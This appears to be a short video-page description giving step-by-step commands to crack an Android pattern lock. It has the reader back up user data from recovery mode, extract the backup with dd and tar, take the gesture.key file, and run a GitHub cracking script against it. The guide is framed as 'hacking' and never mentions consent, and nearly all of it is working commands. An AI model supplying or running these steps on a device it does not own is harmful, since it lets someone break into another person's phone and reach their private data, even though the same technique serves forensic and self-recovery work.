How to Hack Android Pattern (linux/mac unrooted device)


Author: NobusHK
988 View
2m 48s Lenght
7 Rating


How to Hack Android Pattern (linux/mac unrooted device) 1. Reset your Android device in Recovery Mode. 2. Create backup user data from Recovery Mode (an SD card is required to create a file similar with: userdata_xxxx_xxxxxx.backup). 3. Copy the userdata_xxxx_xxxxxx.backup from SD card to Desktop. 4. Convert and extract userdata_xxxx_xxxxxx.backup using next command's: cd ~/Desktop/ dd if=userdata_xxxx_xxxxxx.backup bs=512 skip=1 of=backup.tar.gz mkdir backup tar -xvf backup.tar.gz -C ~/Desktop/backup Target files =========================================== ~/Desktop/backup/system/gesture.key Download: androidpatternlock from github git clone https://github.com/sch3m4/androidpatternlock Now let's try to hack the pattern lock: python ~/Desktop/androidpatternlock/aplc.py ~/Desktop/backup/system/gesture.key


Comments